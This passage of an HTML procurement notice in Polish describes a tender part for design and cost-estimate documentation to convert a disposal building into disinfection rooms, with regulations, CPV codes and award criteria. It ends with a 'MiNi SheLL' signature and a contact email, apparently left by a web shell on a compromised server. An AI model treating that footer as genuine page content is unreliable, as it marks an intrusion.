5. Wykonanie specyfikacji technicznej wykonania i odbioru robót dla wszystkich branż                        i spełniających wymagania rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego (Dz.U. Nr 202/04, poz. 2072 z późn. zm.),
6. Informację dotyczącą bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanego obiektu budowlanego, uwzględnianą w planie bezpieczeństwa i ochrony zdrowia ze wskazaniem w szczególności czy zakres robót obejmuje jeden z rodzajów robót wymienionych w art.21 ust.2 ustawy Prawo budowlane. Informacja winna uwzględniać warunki Rozporządzenia Ministra Infrastruktury z dnia 23 czerwca 2003r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. nr 120, poz.1126)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji projektowo-kosztorysowej dotyczącej             		                zagospodarowania budynku utylizatora  na potrzeby pomieszczeń dezynfektora.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowo - kosztorysowej dotyczącej zagospodarowania budynku utylizatora na potrzeby pomieszczeń dezynfektora
I. Dokumentacja projektowo - kosztorysowa niezbędna do zrealizowania zadania inwestycyjnego powinna składać się z następujących opracowań:
1. Wykonanie dokumentacji inwentaryzacyjnej,
2. Wykonanie dokumentacji budowlanej i wykonawczej z podziałem na branże (wentylacji, elektryczną, wod- kan, c.o., pary) spełniających wymagania rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego ( Dz. U. Nr 120/03, poz. 1133 z późn. zm.) oraz rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. Nr 202/04, poz. 2072 z późn. zm.) wraz ze wszystkimi decyzjami, pozwoleniami, uzgodnieniami, opiniami, i sprawdzeniami których obowiązek uzyskania wynika z przepisów,
3. Wykonanie kosztorysu inwestorskiego zawierającego wszystkie branże i spełniający wymagania rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. Nr 130/04 poz. 1389),
4. Wykonanie przedmiaru robót zawierającego wszystkie branże i spełniający wymagania rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. Nr 202/04, poz. 2072 z późn. zm.),
5. Wykonanie specyfikacji technicznej wykonania i odbioru robót dla wszystkich branż i spełniających wymagania rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r.
w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. Nr 202/04, poz. 2072 z późn. zm.),
6. Informację dotyczącą bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanego obiektu budowlanego, uwzględnianą w planie bezpieczeństwa i ochrony zdrowia ze wskazaniem w szczególności czy zakres robót obejmuje jeden z rodzajów robót wymienionych w art.21 ust.2 ustawy Prawo budowlane. Informacja winna uwzględniać warunki Rozporządzenia Ministra Infrastruktury z dnia 23 czerwca 2003r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. nr 120, poz.1126)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.22.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com